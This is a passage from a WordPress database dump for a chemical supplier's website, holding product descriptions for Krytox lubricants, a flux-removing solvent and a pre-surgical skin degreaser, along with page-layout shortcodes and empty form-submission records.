Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 21:00:38', '2016-12-22 21:00:38', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3350, 0, '2016-12-22 23:02:12', '2016-12-22 23:02:12', '', '', '', 'publish', 'closed', 'closed', '', '3350', '', '', '2016-12-22 23:02:12', '2016-12-22 23:02:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3350/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3351, 0, '2016-12-26 04:15:54', '2016-12-26 04:15:54', '', '', '', 'publish', 'closed', 'closed', '', '3351', '', '', '2016-12-26 04:15:54', '2016-12-26 04:15:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3351/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3352, 0, '2016-12-27 14:03:17', '2016-12-27 14:03:17', '', '', '', 'publish', 'closed', 'closed', '', '3352', '', '', '2016-12-27 14:03:17', '2016-12-27 14:03:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3352/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3353, 0, '2016-12-27 17:11:27', '2016-12-27 17:11:27', '', '', '', 'publish', 'closed', 'closed', '', '3353', '', '', '2016-12-27 17:11:28', '2016-12-27 17:11:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3353/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3354, 0, '2016-12-27 21:01:16', '2016-12-27 21:01:16', '', '', '', 'publish', 'closed', 'closed', '', '3354', '', '', '2016-12-27 21:01:16', '2016-12-27 21:01:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3354/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3355, 0, '2016-12-27 21:24:18', '2016-12-27 21:24:18', '', '', '', 'publish', 'closed', 'closed', '', '3355', '', '', '2016-12-27 21:24:19', '2016-12-27 21:24:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3355/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3356, 0, '2016-12-28 04:21:23', '2016-12-28 04:21:23', '', '', '', 'publish', 'closed', 'closed', '', '3356', '', '', '2016-12-28 04:21:23', '2016-12-28 04:21:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/3356/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3358, 3, '2016-12-28 13:24:57', '2016-12-28 13:24:57', '<span style="text-decoration: underline;"><strong>Description</strong></span>\r\n\r\nMS-550N / MS-552N is a nonflammable, cleaning solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications. Benefit Include:\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non-ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<span style="text-decoration: underline;"><strong>Properties of Solvent:</strong></span>\r\nBoiling Point………………………………… 122°F /50°C\r\nFlash Point…………………………………….…….None\r\nLiquid Density…………………..1.35 g/ml @ 77°F/25°C\r\nOzone Depletion……………………………………..0.00<strong> </strong>\r\n\r\n<span style="text-decoration: underline;"><strong>Plastic Compatibility:</strong></span>\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<table style="height: 141px;" width="498">\r\n<tbody>\r\n<tr>\r\n<td width="168">·         Acetal</td>\r\n<td width="168">·         Polyethylene</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polypropylene</td>\r\n<td width="168">·         Polyester, PBT, PET</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PEK, PEEK</td>\r\n<td width="168">·         Epoxy-Phenolcs</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polyimides</td>\r\n<td width="168">·         Polyvinylchloride</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PTFE</td>\r\n<td width="168">·         Liq. Crystal Polymer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>NOTE:</strong><strong>  </strong>Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\n<span style="text-decoration: underline;"><strong>Elastomer Capability: </strong></span>\r\n\r\n(Immersion: 15 mins at Room Temperature)\r\n<table style="height: 117px;" width="545">\r\n<tbody>\r\n<tr>\r\n<td width="168">·   Butyl Rubber</td>\r\n<td width="168">·    Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Polysulfide</td>\r\n<td width="168">·    EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Buna S</td>\r\n<td width="168">·    Buna N</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Neoprene</td>\r\n<td width="168">·    Urethane</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Chlorosulfonated PE</td>\r\n<td width="168">·    Silicone</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Viton™</td>\r\n<td width="168"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.', 'MS-550N / MS-552N', '<strong>Ideal for Heavy Duty Applications and Electrical Cleaning: </strong>A nonflammable, cleaning  solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies. Evaporates quickly and leaves no residue.', 'publish', 'closed', 'closed', '', 'cleaning-solvent-and-flux-remover', '', '', '2016-12-28 13:38:28', '2016-12-28 13:38:28', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3358', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3359, 3, '2016-12-28 13:16:55', '2016-12-28 13:16:55', '', 'Cleaning Solvent and Flux Remover', '', 'inherit', 'closed', 'closed', '', 'shutterstock_543794323', '', '', '2016-12-28 13:19:57', '2016-12-28 13:19:57', '', 3358, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_543794323.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3360, 3, '2016-12-28 13:19:39', '2016-12-28 13:19:39', '', 'ms-550n-552n', '', 'inherit', 'closed', 'closed', '', 'ms-550n-552n-2', '', '', '2016-12-28 13:19:39', '2016-12-28 13:19:39', '', 3358, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/MS-550N-552N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3361, 3, '2016-12-28 13:38:06', '2016-12-28 13:38:06', '<span style="text-decoration: underline;"><strong>Description</strong></span>\n\nMS-550N / MS-552N is a nonflammable, cleaning solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications. BEne\n\n&nbsp;\n<ul>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Nonflammable</li>\n 	<li>Non-ozone depleting</li>\n 	<li>RoHS Compliant</li>\n</ul>\n<span style="text-decoration: underline;"><strong>Properties of Solvent:</strong></span>\nBoiling Point………………………………… 122°F /50°C\nFlash Point…………………………………….…….None\nLiquid Density…………………..1.35 g/ml @ 77°F/25°C\nOzone Depletion……………………………………..0.00<strong> </strong>\n\n<span style="text-decoration: underline;"><strong>Plastic Compatibility:</strong></span>\n\n(Immersion: 15 minutes at Room Temperature)\n<table style="height: 141px;" width="498">\n<tbody>\n<tr>\n<td width="168">·         Acetal</td>\n<td width="168">·         Polyethylene</td>\n</tr>\n<tr>\n<td width="168">·         Polypropylene</td>\n<td width="168">·         Polyester, PBT, PET</td>\n</tr>\n<tr>\n<td width="168">·         PEK, PEEK</td>\n<td width="168">·         Epoxy-Phenolcs</td>\n</tr>\n<tr>\n<td width="168">·         Polyimides</td>\n<td width="168">·         Polyvinylchloride</td>\n</tr>\n<tr>\n<td width="168">·         PTFE</td>\n<td width="168">·         Liq. Crystal Polymer</td>\n</tr>\n</tbody>\n</table>\n<strong>NOTE:</strong><strong>  </strong>Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n\n<span style="text-decoration: underline;"><strong>Elastomer Capability: </strong></span>\n\n(Immersion: 15 mins at Room Temperature)\n<table style="height: 117px;" width="545">\n<tbody>\n<tr>\n<td width="168">·   Butyl Rubber</td>\n<td width="168">·    Natural Rubber</td>\n</tr>\n<tr>\n<td width="168">·   Polysulfide</td>\n<td width="168">·    EPDM</td>\n</tr>\n<tr>\n<td width="168">·   Buna S</td>\n<td width="168">·    Buna N</td>\n</tr>\n<tr>\n<td width="168">·   Neoprene</td>\n<td width="168">·    Urethane</td>\n</tr>\n<tr>\n<td width="168">·   Chlorosulfonated PE</td>\n<td width="168">·    Silicone</td>\n</tr>\n<tr>\n<td width="168">·   Viton™</td>\n<td width="168"></td>\n</tr>\n</tbody>\n</table>\n<strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.', 'MS-550N / MS-552N', '<strong>Ideal for Heavy Duty Applications and Electrical Cleaning: </strong>A nonflammable, cleaning  solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies. Evaporates quickly and leaves no residue.', 'inherit', 'closed', 'closed', '', '3358-autosave-v1', '', '', '2016-12-28 13:38:06', '2016-12-28 13:38:06', '', 3358, 'https://www.miller-stephenson.com/3358-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3362, 0, '2016-12-28 16:11:29', '2016-12-28 16:11:29', '', '', '', 'publish', 'closed', 'closed', '', '3362', '', '', '2016-12-28 16:11:29', '2016-12-28 16:11:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3362/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3363, 2, '2016-12-28 18:21:02', '2016-12-28 18:21:02', '<h3><strong>H-1112B Skin Degreaser</strong></h3>\r\nWhen we introduced nonflammable Miller-Stephenson Skin Degreaser, we knew it was an innovation in pre-surgical cleaners. It also degreases catheter, biopsy and colostomy sites. It improves adhesion of EKG electrodes. Prevents smudging of surgical pen markings in plastic and vascular surgery. You\'ll find that Miller-Stephenson Skin Degreaser is even more versatile because it goes wherever your job takes you.\r\n<h4><strong>Pre-surgical Skin Cleaner | Defatting Agent for Adhesion of Drapes</strong></h4>\r\nPrecautions:\r\n\r\nUse Sparingly to minimize vapor concentrations.\r\n<ol>\r\n 	<li>Use no more than 100 mls. per application.</li>\r\n 	<li>Use only in a well-ventilated room.</li>\r\n 	<li>Do not use on or near the face.</li>\r\n 	<li>In event of accidental overexposure, do not administer epinephrine. Do not use on patients with history of cardiac arrhythmia.</li>\r\n 	<li>Keep in closed container when not in use.</li>\r\n</ol>\r\n<h4><strong>Description of Use:</strong></h4>\r\nDry the skin if any water or perspiration is present, then apply Miller-Stephenson Skin Degreaser using a saturated swab. Follow by wiping with a dry swab.\r\n<h4><strong>Applications Include:</strong></h4>\r\n<ul>\r\n 	<li>Surgical Drapes</li>\r\n 	<li>Tape</li>\r\n 	<li>EKG Electrodes</li>\r\n 	<li>Plastic Surgery</li>\r\n 	<li>Colostomy Bags</li>\r\n 	<li>IV Sites</li>\r\n 	<li>Grounding Pads</li>\r\n 	<li>Dressings</li>\r\n 	<li>Ostomy Appliances</li>\r\n</ul>\r\n<h4><strong>One of the purest, Nonflammable substances available...</strong></h4>\r\nMiller-Stephenson Skin Degreaser has been used for a number of years as a skin cleaner and is now available in a convenient package cleared by the F.D.A. It has a low order of toxicity, is nonflammable, and has a high degree of purity.\r\n\r\nThis product is <a href="https://www.fda.gov/">F.D.A.</a> approved.', 'H-1112B Skin Degreaser', 'When we introduced nonflammable Miller-Stephenson Skin Degreaser, we knew it was an innovation in pre-surgical cleaners. It also degreases catheter, biopsy and colostomy sites.  It improves adhesion of EKG electrodes. Prevents smudging of surgical pen markings in plastic and vascular surgery.', 'publish', 'closed', 'closed', '', 'h-1112b-skin-degreaser', '', '', '2016-12-28 18:21:02', '2016-12-28 18:21:02', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3363', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3364, 2, '2016-12-28 18:10:13', '2016-12-28 18:10:13', '', 'h1112b SDS', '', 'inherit', 'closed', 'closed', '', 'h1112b', '', '', '2016-12-28 18:10:22', '2016-12-28 18:10:22', '', 3363, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/H1112B.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3365, 2, '2016-12-28 18:14:16', '2016-12-28 18:14:16', '', 'Skin Degreaser', '', 'inherit', 'closed', 'closed', '', 'shutterstock_280855511', '', '', '2016-12-28 18:14:26', '2016-12-28 18:14:26', '', 3363, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_280855511.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3366, 2, '2016-12-28 18:15:33', '2016-12-28 18:15:33', '', 'Skin Degreaser H-1112B', '', 'inherit', 'closed', 'closed', '', 'skin-degreaser-h-1112b', '', '', '2016-12-28 18:15:55', '2016-12-28 18:15:55', '', 3363, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/Skin-Degreaser-H-1112B.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3367, 2, '2016-12-28 19:21:33', '2016-12-28 19:21:33', '<meta name="google-site-verification" content="jm5L09lM8uFLQ9zF326l598hLano6cavx-NzjAnAXzA" />\r\n[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image 